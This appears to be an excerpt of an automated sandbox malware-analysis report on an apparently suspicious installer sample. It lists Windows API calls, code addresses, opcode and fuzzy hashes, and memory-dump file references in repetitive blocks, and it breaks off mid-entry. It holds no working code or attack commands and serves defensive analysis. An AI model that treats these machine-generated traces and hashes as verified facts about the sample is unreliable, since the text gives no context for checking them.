                                                        • Opcode ID: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                        • Instruction ID: af3d40abcb4b92d5c03464ca519eb5fb88e5f0cb8c812bf2788953b75bb9e179
                                                        • Opcode Fuzzy Hash: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                        • Instruction Fuzzy Hash: B911B231504514EBDF20AFA5CD4169F36A0EF14368B29493FE942B22F1D63E8981DA5D
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 004056CA
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                          • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                        • Instruction ID: a38bd53333deb2965cf6bcfe27cab5e967b0379a0e7dc5bd4266cb97908be95f
                                                        • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                        • Instruction Fuzzy Hash: A901B131200708EFDB204F90DEC0A9B3665FB84750F504036F605761D1D77A8C92AE2D
                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067E1,80000002), ref: 004065B6
                                                        • RegCloseKey.KERNELBASE(?), ref: 004065C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: Call
                                                        • API String ID: 3356406503-1824292864
                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction ID: 4169300ffd031f607b120f1368fde5344542a6b636238975c7224480bb0190f2
                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction Fuzzy Hash: 93017C72500209BBDF218F55DC09EDB3BA8EB54364F01803AFD1AA2190E778D964DBA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                        • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                        • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                        • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                        • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                        • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                        • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                        • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                        • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                        • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                        • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                        • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                        • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                        • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                        • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                        • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                        • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                        • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                        • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                        • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                        • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                        • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004034B2
                                                          • Part of subcall function 0040361D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                        • SetFilePointer.KERNELBASE(00007A7E,00000000,00000000,00414EF0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FilePointer$CountTick
                                                        • String ID:
                                                        • API String ID: 1092082344-0
                                                        • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                        • Instruction ID: f81ac03ea206090be76b65a385b2ac7d4b581aa0cbae2b80a2d2021fe8c89915
                                                        • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                        • Instruction Fuzzy Hash: 7E319CB2600201EFC7209F29EE859263FA9F740356B55023BF901B22F1CBB59E41DB9C
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                          • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                          • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                        • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 334405425-0
                                                        • Opcode ID: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                        • Instruction ID: 77040aa306750b8c28c9decefed3201328e3be048babc7be2d350fd99aa9233c
                                                        • Opcode Fuzzy Hash: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                        • Instruction Fuzzy Hash: A3219F31904204EADF10AFA5CF89A9E7A71BF44359F30413BE105B91E5CBBD8982DA2D
                                                        APIs
                                                        • GlobalFree.KERNEL32(0083BE60), ref: 00401C30
                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree
                                                        • String ID: Call
                                                        • API String ID: 3394109436-1824292864
                                                        • Opcode ID: dc8853be1138b779fa27739f63eb55e8c503a151d57956236f417371b8924568
                                                        • Instruction ID: ce9828fb533201d430d1dfc272b0b5c9437a35d96f5815e0f5c69034b7ba0116
                                                        • Opcode Fuzzy Hash: dc8853be1138b779fa27739f63eb55e8c503a151d57956236f417371b8924568
                                                        • Instruction Fuzzy Hash: 0021F372944150EBDB20BBA4DE85A5E33A8AB04714718093FF552F32D0C6BC9C918B9D
                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: 6ec1cb72de713890a7fe95da29bb3e661ce5d0c083e3d0a32e7bda596729ac32
                                                        • Instruction ID: fde7ee3b690bf0a9f1400c3c006cad269c6ae989cb90eb9f0638982b81c2946e
